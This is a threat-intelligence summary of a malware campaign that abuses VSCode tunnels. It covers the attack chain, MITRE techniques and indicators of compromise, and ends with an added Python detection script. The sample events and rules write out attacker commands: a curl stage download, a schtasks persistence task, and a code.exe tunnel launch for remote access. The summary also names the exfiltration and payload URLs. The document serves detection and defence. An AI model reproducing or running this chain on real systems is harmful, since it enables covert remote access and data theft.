Keypoints
- Initial vector: a disguised .LNK file (masquerading as an installer) that downloads and extracts a Python embed package.
- The shortcut saves and executes a malicious script (update.py) using pythonw.exe to run silently.
- The script checks for/installs the VSCode CLI (code.exe) into %LOCALAPPDATA% and uses the VSCode tunnel feature to create a remote session tied to a GitHub activation code.
- Persistence is established via a scheduled task named MicrosoftHealthcareMonitorNode; behavior differs by privilege (4-hour trigger for non-admin, SYSTEM logon trigger for admin with high priority).
- Data collection includes folder listings, running processes, system locale/location, and user/domain info; data is base64-encoded and POSTed to requestrepo.com.
- Attack flow and tooling mirror techniques previously observed from the Stately Taurus group, enabling full remote file and terminal access for follow-on activity.
MITRE Techniques
- [T1059.006] Command and Scripting Interpreter: Python – The attacker downloads and executes a Python script to perform installation and orchestration (‘Update.py is downloaded and executed by the shortcut file.’)
- [T1053.005] Scheduled Task/Job: Scheduled Task – The malware creates a scheduled task “MicrosoftHealthcareMonitorNode” to run update.py on a regular schedule or at logon (‘“MicrosoftHealthcareMonitorNode” scheduled task is created’).
- [T1036.005] Masquerading: Match Legitimate Name or Location – The campaign places files under %localappdata%/Microsoft/Python to resemble legitimate application folders (‘Creates a folder “%localappdata%/Microsoft/Python” directory’).
- [T1082] System Information Discovery – The script collects system language, geo-location, computername, username, and userdomain for environment profiling (‘Collects system’s language settings, geographical location, computername, username, and userdomain’).
- [T1420] File and Directory Discovery – The actor gathers folder names from Program Files/ProgramData/Users to map the filesystem (‘Collects folder names present in program files and program data directory’).
- [T1057] Process Discovery – The malware runs tasklist to enumerate running processes and detect code.exe instances (‘“tasklist” command is used to gather a list of currently running processes.’)
- [T1071.001] Application Layer Protocol: Web Protocols – VSCode tunnel and HTTP POST are used for command-and-control and data transfer (‘The VSCode tunnel feature is used to access the victim’s system.’)
Indicators of Compromise
- [SHA-256] Shortcut and script hashes – 281766109f2375a01bad80478fd18841eccaefc1ee9277179cc7ff075d1beae2 (shortcut), c7f07bdfb91653f53782885a3685436e2e965e1c5f4863c03f5a9825c0364489 (update.py)
- [URL] Malicious download locations – hxxps://paste[.]ee/r/DQjrd/0 (source of update.py)
- [C2 URL] Exfiltration endpoint – hxxp://requestrepo.com/r/2yxp98b3 (POST target used to receive stolen data)
- [Filenames/Paths] Deployed artifacts and directories – update.py, python-3.12.5-embed-amd64.zip, and installation paths such as %LOCALAPPDATA%\Microsoft\Python and %LOCALAPPDATA%\microsoft\VScode
The operation starts when a user executes a malicious .LNK masquerading as an installer; the shortcut displays a fake success message while using curl to download an embedded Python ZIP (python-3.12.5-embed-amd64.zip). The ZIP is extracted into %LOCALAPPDATA% (e.g., %LOCALAPPDATA%\Microsoft\Python), then update.py is fetched from a paste.ee URL and launched with pythonw.exe so that no console window is shown.
Update.py verifies or deploys the VSCode CLI (code.exe) into %LOCALAPPDATA%\microsoft\VScode, creates or updates a scheduled task named MicrosoftHealthcareMonitorNode for persistence (four-hour recurring run for non-admins; SYSTEM-level logon trigger with high priority when admin privileges exist), and manages VSCode tunnels. The script logs out existing tunnels, starts a new tunnel with the command “code.exe --locale en-US tunnel --accept-server-license-terms --name” followed by a tunnel name, captures the output to files (output.txt/output2.txt), and extracts the 8-character GitHub device activation code via regex for later use.
The malware collects system details (locale, geo-info, computer name, username, userdomain), enumerates directories (Program Files, ProgramData, Users) and processes (via tasklist), encodes the results in base64, and sends them to the actor’s endpoint at requestrepo.com through an HTTP POST. The adversary then redeems the captured activation code at GitHub’s device login to activate the VSCode tunnel and obtain interactive file and terminal access for follow-on actions such as credential harvesting and tool execution.
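The chain above leaves distinctive process-creation traces at each stage: curl fetching the embed ZIP, pythonw.exe launching update.py from the masquerading %LOCALAPPDATA%\Microsoft\Python folder, schtasks registering MicrosoftHealthcareMonitorNode, and code.exe starting a tunnel with the license terms pre-accepted. The following detection logic is an added example written for this summary, not code from the report or the campaign; the events it scans are constructed in a Sysmon Event ID 1 style, and the rule names, the sample host paths and the tunnel name host01 are placeholders.

```python
import re
from typing import Dict, List

# Detection rules keyed by name; each is a case-insensitive regex over "Image CommandLine".
# Patterns are derived only from the behaviours summarised above.
RULES: Dict[str, re.Pattern] = {
    # update.py launched silently from the masquerading %LOCALAPPDATA%\Microsoft\Python folder
    "pythonw_from_localappdata_microsoft_python": re.compile(
        r"\\appdata\\local\\microsoft\\python\\pythonw\.exe\b.*\bupdate\.py\b", re.I),
    # VSCode CLI tunnel started non-interactively (license terms pre-accepted)
    "vscode_cli_tunnel_start": re.compile(
        r"\\code\.exe\b.*\btunnel\b.*--accept-server-license-terms", re.I),
    # persistence task name reported for this campaign
    "schtask_MicrosoftHealthcareMonitorNode": re.compile(
        r"schtasks(\.exe)?\b.*/create\b.*MicrosoftHealthcareMonitorNode", re.I),
    # curl pulling the Python embed package, or update.py from paste.ee
    "curl_stage_download": re.compile(
        r"\\curl\.exe\b.*(python-3\.12\.5-embed-amd64\.zip|paste\.ee/)", re.I),
}

def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules matching one process-creation event."""
    haystack = f"{event.get('Image', '')} {event.get('CommandLine', '')}"
    return [name for name, pat in RULES.items() if pat.search(haystack)]

def scan(events) -> Dict[str, int]:
    """Count rule hits across events; several distinct rules firing on one host
    indicates the full chain (stage download, silent script, persistence, tunnel)."""
    hits: Dict[str, int] = {}
    for ev in events:
        for name in classify(ev):
            hits[name] = hits.get(name, 0) + 1
    return hits

# Constructed sample events (not taken from the report); the last one is a benign editor launch.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r'curl.exe -o "C:\Users\u\AppData\Local\python-3.12.5-embed-amd64.zip" https://download.example/python-3.12.5-embed-amd64.zip'},
    {"Image": r"C:\Users\u\AppData\Local\Microsoft\Python\pythonw.exe",
     "CommandLine": r'"C:\Users\u\AppData\Local\Microsoft\Python\pythonw.exe" update.py'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn MicrosoftHealthcareMonitorNode /sc hourly /mo 4 /tr "C:\Users\u\AppData\Local\Microsoft\Python\pythonw.exe update.py" /f'},
    {"Image": r"C:\Users\u\AppData\Local\microsoft\VScode\code.exe",
     "CommandLine": r'code.exe --locale en-US tunnel --accept-server-license-terms --name host01'},
    {"Image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": r'"C:\Program Files\Microsoft VS Code\Code.exe" C:\proj'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev) or ["-"], ev["Image"])
    print(scan(SAMPLE_EVENTS))
```

The scheduled-task event also trips the pythonw rule because its /tr argument carries the full update.py launch path, which is the expected overlap rather than a false positive.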